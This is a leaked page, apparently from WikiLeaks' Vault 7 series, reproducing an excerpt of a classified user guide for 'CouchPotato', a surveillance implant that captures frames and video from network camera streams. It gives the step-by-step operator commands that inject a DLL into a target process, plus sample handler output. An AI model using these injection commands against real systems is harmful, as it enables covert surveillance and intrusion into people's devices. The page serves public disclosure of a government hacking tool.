Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
3.2 (S//NF) Capturing image frames of significant
change
3.2.1 Start the CouchPotato handler.
3.2.2 Use the –f image2 - as output format argument; the file location
should always just be a “-“(as in pipe to stdout).
3.2.3 The collected images are written to the root of the directory that
was passed to the CouchPotato handler script. The images are written
with a file name of the form:
YYYYMMDD_HHMMSS.milliseconds.jpg – This timestamp is in
GMT and uses the time facilities of the local machine the script runs
on.
Example using ShellTerm (no line breaks):
icedll –p <pid> -a “-i rtsp://video.stream.net:8554/ip_camera_path –f
image2 –“ –-pipe /tmp/handler_pipe couchpotato_x86_64.dll
Example output from the handler:
Tue, 11 Feb 2014 18:28:48 -0000: [*] Starting Handler
Tue, 11 Feb 2014 18:28:48 -0000: [*] Listening at /tmp/cph_socket for connections
Tue, 11 Feb 2014 18:28:48 -0000: [*] Waiting on connection from ICE host
Tue, 11 Feb 2014 18:29:00 -0000: [*] Connection with ICE host established
Tue, 11 Feb 2014 18:29:20 -0000: Image data recv'd.
Tue, 11 Feb 2014 18:29:20 -0000: Wrote ./20140211_132920.735441.jpg
Tue, 11 Feb 2014 18:30:26 -0000: Image data recv'd.
Tue, 11 Feb 2014 18:30:26 -0000: Wrote ./20140211_133026.620722.jpg
3.3 (S//NF) Capturing video (without audio)
3.3.1 Start the CouchPotato handler.
3.3.2 Use the –vcodec copy –an -f avi – the arguments; the output file
location should always be just a “-“ (as in pipe to stdout).
3.3.3 The video file is written to the root of the directory that was passed
to the CouchPotato handler script. The video file is written with a file
name of the form: YYYYMMDD_HHMMSS.avi – This timestamp is
in GMT and uses the time facilities of the local machine the script
runs on.
Example using ShellTerm (no line breaks):
icedll –p <pid> -a “-i rtsp://video.stream.net:8554/ip_camera_path
-t 300 -vcodec copy –an -f avi –“ –-pipe /tmp/handler_pipe
couchpotato_x86_64.dll
Example output from the handler:
SECRET//NOFORN

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh